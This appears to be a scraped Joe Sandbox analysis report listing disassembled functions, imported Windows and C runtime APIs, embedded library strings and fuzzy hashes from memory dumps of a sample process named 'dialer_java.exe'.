Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: _time64
String ID: %s $[%Y-%m-%d %H:%M:%S]
API String ID: 1670930206-899559958
Opcode ID: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
Instruction ID: 356c8f51dedf4a2b9c916477264dd90112f8c3fbbdea8b74c678cc24ce39cdca
Opcode Fuzzy Hash: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
Instruction Fuzzy Hash: 0C016D31629B8690EA209F11F9913FA6366FB887D0F685031E98E93B569E3CD14AC700

Function 00007FF6099B2390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6099B23EA

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6099B23DD
Unknown error, xrefs: 00007FF6099B23B4

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
Instruction ID: f9d76d5d1c68761c01db790320c60ec8f3a3609a861695c8a2e35f44a46d0ad7
Opcode Fuzzy Hash: 0d15dd107c1c7b7ee9c3dbc79bee5512547a48c097ea1489700897209fd66f7b
Instruction Fuzzy Hash: 90F06221A1EA5582E610AF64AA811BD6322EF597D1F689231EF4DD7757DF2CE1828300

Function 00007FF6099D0777 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 00007FF6099D0779
strlen.MSVCRT ref: 00007FF6099D0AE1

Strings

(null), xrefs: 00007FF6099D0781

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: strerrorstrlen
String ID: (null)
API String ID: 960536887-3941151225
Opcode ID: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
Instruction ID: 3e18b7f4f0c3d5233ec7c0df264b8366d35433dfe4a26fde9b09586872ae83ef
Opcode Fuzzy Hash: f2373a739143e5c7c6886a2839f5784e2abfccd3a5dafc2859586661781da765
Instruction Fuzzy Hash: C6E0B614B1F60282FA04AEA294951FE69635F84790FBC4036E94EC3387EE3CE4029291

Function 00007FF6099B35C0 Relevance: 5.1, APIs: 4, Instructions: 76stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF6099B35F6
strcmp.MSVCRT ref: 00007FF6099B360E
strcmp.MSVCRT ref: 00007FF6099B3629
strcmp.MSVCRT ref: 00007FF6099B3641

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
Instruction ID: 8b4552b9cf8e5b37ed2dbc9013acc71c1d87281c8cae36613dd0764ae798dfd1
Opcode Fuzzy Hash: 66c6bf3b211be3c92e68e951745e0b462fee0e45d65b69b835429f12a872f51f
Instruction Fuzzy Hash: 1B214172A0A642C2EB78CE12D247139A6F6FB14794F6D8536CF4DC6792DE3DF8818600

Function 00007FF6099B4FFE Relevance: 5.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6099B5012
TlsGetValue.KERNEL32 ref: 00007FF6099B504B
GetLastError.KERNEL32 ref: 00007FF6099B5050
LeaveCriticalSection.KERNEL32 ref: 00007FF6099B50CC

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
Instruction ID: fd8ab49cbbcc95ea3d832a5df403968181d42c29be117ce7423d9f8a67e91fb2
Opcode Fuzzy Hash: c3e10df1fb81cec98377597e4f843a6904a990f22e519dfd6c3b42c4d24bae7a
Instruction Fuzzy Hash: 66012C25E0D60282F6568F52EA142742333BF05BA0FA90435DE0EC7792FF2DAC958241

Analysis Process: dialer_java.exePID: 7448, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	51
Total number of Limit Nodes:	2

Executed Functions

Function 00007FF6E3A61160 Relevance: 13.6, APIs: 9, Instructions: 130
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF6E3A61156), ref: 00007FF6E3A611A5
_amsg_exit.MSVCRT(?,?,?,00007FF6E3A61156), ref: 00007FF6E3A611CC
_initterm.MSVCRT ref: 00007FF6E3A6120F
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF6E3A61156), ref: 00007FF6E3A6124E
malloc.MSVCRT ref: 00007FF6E3A6127E
strlen.MSVCRT ref: 00007FF6E3A612A4
malloc.MSVCRT ref: 00007FF6E3A612B0
memcpy.MSVCRT ref: 00007FF6E3A612C3
_cexit.MSVCRT(?,?,?,00007FF6E3A61156), ref: 00007FF6E3A6132D

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
String ID:
API String ID: 2643109117-0
Opcode ID: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
Instruction ID: ad52f5a23d23c214c2b6e8cc16b8d576ba23f7326ab75b7bd45e7d6b8c5d5049
Opcode Fuzzy Hash: db9654a873d05972df7c4cd3774028c37a5ca561359b6cfc46425ec131679173
Instruction Fuzzy Hash: 62515E73F1964781F6109B2DE95A3793FA4BF95B80F004435C94EE73A1DE2EA4C1874A

Function 00007FF6E3A61394 Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtRequestPort.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A61156), ref: 00007FF6E3A613F7

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: PortRequest
String ID:
API String ID: 2900110961-0
Opcode ID: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
Instruction ID: 3744e0ce1cc0dc6cade55385d7258ac9443734480f345688f3513dbbbcac966b
Opcode Fuzzy Hash: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
Instruction Fuzzy Hash: 79F0C976A0CB4182D610CF59F84222A7B74FB48380B015835EACDA7765CF3EE0A0CB49

Non-executed Functions

Function 00007FF6E3A76520 Relevance: 37.2, APIs: 16, Strings: 5, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

realloc.MSVCRT ref: 00007FF6E3A766DC
malloc.MSVCRT ref: 00007FF6E3A76735
malloc.MSVCRT ref: 00007FF6E3A767D7
malloc.MSVCRT ref: 00007FF6E3A7684C
memcpy.MSVCRT ref: 00007FF6E3A7686B
realloc.MSVCRT ref: 00007FF6E3A768CB
memchr.MSVCRT ref: 00007FF6E3A7694E
malloc.MSVCRT ref: 00007FF6E3A76999
memcpy.MSVCRT ref: 00007FF6E3A769B8
realloc.MSVCRT ref: 00007FF6E3A76A61
malloc.MSVCRT ref: 00007FF6E3A76A7A
memcpy.MSVCRT ref: 00007FF6E3A76A99
malloc.MSVCRT ref: 00007FF6E3A76B90
free.MSVCRT ref: 00007FF6E3A76C51
_assert.MSVCRT ref: 00007FF6E3A76C80
_assert.MSVCRT ref: 00007FF6E3A76C9A

Strings

Last != First && "Popping empty vector!", xrefs: 00007FF6E3A76C86
'block-literal', xrefs: 00007FF6E3A7682F
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A76C73, 00007FF6E3A76C8D
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF6E3A76C6C
yptn, xrefs: 00007FF6E3A768C0

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$memcpyrealloc$_assert$freememchr
String ID: 'block-literal'$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Popping empty vector!"$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
API String ID: 3787261664-3461159648
Opcode ID: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
Instruction ID: 2eabe8cce145a44d6fca95da0e5c3f4bf4efa98aff464b751c449cb0ed1dcccc
Opcode Fuzzy Hash: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
Instruction Fuzzy Hash: 3622B233709B8281EA248F29E4853BA7BA4FB45B84F054235DA9D577E9EF3DE481C305

Function 00007FF6E3A6A480 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 400
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF6E3A6A4C9
malloc.MSVCRT ref: 00007FF6E3A6A813
realloc.MSVCRT ref: 00007FF6E3A6AA84
free.MSVCRT ref: 00007FF6E3A6AAFA
free.MSVCRT ref: 00007FF6E3A6AB14
free.MSVCRT ref: 00007FF6E3A6AB26
free.MSVCRT ref: 00007FF6E3A6AB38
free.MSVCRT ref: 00007FF6E3A6AB47

Strings

k_invoke, xrefs: 00007FF6E3A6A909
invocation function for block in , xrefs: 00007FF6E3A6A9B6
Parser.ForwardTemplateRefs.empty(), xrefs: 00007FF6E3A6AB9B
___Z, xrefs: 00007FF6E3A6A752
_block_i, xrefs: 00007FF6E3A6A8FC
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_demangle.cpp, xrefs: 00007FF6E3A6ABA2
____, xrefs: 00007FF6E3A6A765

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: free$mallocreallocstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_demangle.cpp$Parser.ForwardTemplateRefs.empty()$___Z$____$_block_i$invocation function for block in $k_invoke
API String ID: 3545345670-2202808109
Opcode ID: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
Instruction ID: d09e21ef12961e8662e6d5aa357cb9af687fc91c2ad437d5aad247f8498f8684
Opcode Fuzzy Hash: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
Instruction Fuzzy Hash: E012AC63A1DBC281EB718F08E4553FABBA4EB94750F104231EA8D52A94EF7ED5C1CB05

Function 00007FF6E3A7D0F0 Relevance: 15.4, APIs: 9, Strings: 1, Instructions: 416stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7D207
malloc.MSVCRT ref: 00007FF6E3A7D31B
malloc.MSVCRT ref: 00007FF6E3A7D47B
malloc.MSVCRT ref: 00007FF6E3A7D51E
strlen.MSVCRT ref: 00007FF6E3A7D553
malloc.MSVCRT ref: 00007FF6E3A7D5CE
strlen.MSVCRT ref: 00007FF6E3A7D603
malloc.MSVCRT ref: 00007FF6E3A7D67E
strlen.MSVCRT ref: 00007FF6E3A7D6B3

Strings

objcprot, xrefs: 00007FF6E3A7D2A1

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$strlen
String ID: objcprot
API String ID: 832207080-2390413308
Opcode ID: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
Instruction ID: cf63f71301cc327ab38e5b634ad9f01554a151dd3665b5ad329f0fad37ecd153
Opcode Fuzzy Hash: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
Instruction Fuzzy Hash: 8B02F333709B8181EB258B28E4857A97BA4EB04B94F454331DFAC573D9DF39E5A2C309

Function 00007FF6E3A74440 Relevance: 13.0, APIs: 10, Instructions: 464COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7446C
malloc.MSVCRT ref: 00007FF6E3A74575
malloc.MSVCRT ref: 00007FF6E3A74675
malloc.MSVCRT ref: 00007FF6E3A74700
malloc.MSVCRT ref: 00007FF6E3A747DA
malloc.MSVCRT ref: 00007FF6E3A748E8
malloc.MSVCRT ref: 00007FF6E3A7495C

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
Instruction ID: b7c4e55b2dbc41e49bac922fe71889640647f26a64f3ca18c2d94b6fd24e2bda
Opcode Fuzzy Hash: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
Instruction Fuzzy Hash: 6D22E233709B8185EB258B18E0893AD3BA8FB44B80F584239DB9D573D5DF39E592C319

Function 00007FF6E3A70160 Relevance: 10.9, APIs: 7, Instructions: 377COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A70280
malloc.MSVCRT ref: 00007FF6E3A70376
malloc.MSVCRT ref: 00007FF6E3A706A8

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
Instruction ID: 8c277a2c7f254ed266284155c8831d5de2c305799f82cd17a9b735564d77625a
Opcode Fuzzy Hash: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
Instruction Fuzzy Hash: 9EE1F373719B8245EF24CB18D4867B92BA4EB44B80F084171CE4CAB7D9EF7DE591830A

Function 00007FF6E3A776E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A77A37
memcpy.MSVCRT ref: 00007FF6E3A77A53

Strings

%LaL, xrefs: 00007FF6E3A779E9

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memcpyrealloc
String ID: %LaL
API String ID: 2500458235-3433341929
Opcode ID: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
Instruction ID: 98d85f4d923cc0e85b063a11eb219d85e3d52ca7e46b3b0346974fcbc1300c01
Opcode Fuzzy Hash: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
Instruction Fuzzy Hash: D7916B6BB1C6E116EB394339F550F9D2E60C7A2762F059315CBB403F9AD92FC2168B05

Function 00007FF6E3A64120 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6E3A68350: RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF6E3A684FA

fflush.MSVCRT ref: 00007FF6E3A64370
fflush.MSVCRT ref: 00007FF6E3A6422D

Part of subcall function 00007FF6E3A68A70: getenv.MSVCRT ref: 00007FF6E3A68A93

fflush.MSVCRT ref: 00007FF6E3A64287
fflush.MSVCRT ref: 00007FF6E3A642D2
fflush.MSVCRT ref: 00007FF6E3A64336
fflush.MSVCRT ref: 00007FF6E3A643CE
fflush.MSVCRT ref: 00007FF6E3A6440E
fflush.MSVCRT ref: 00007FF6E3A64448

Strings

libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT, xrefs: 00007FF6E3A64357
libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx, xrefs: 00007FF6E3A64214
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK, xrefs: 00007FF6E3A643F2
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR, xrefs: 00007FF6E3A64499
libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d, xrefs: 00007FF6E3A6426B
libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK, xrefs: 00007FF6E3A6442B
.anonymous., xrefs: 00007FF6E3A641E6
libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK, xrefs: 00007FF6E3A6438D
libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p, xrefs: 00007FF6E3A642B6
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND, xrefs: 00007FF6E3A6431D
libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function, xrefs: 00007FF6E3A643AE

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
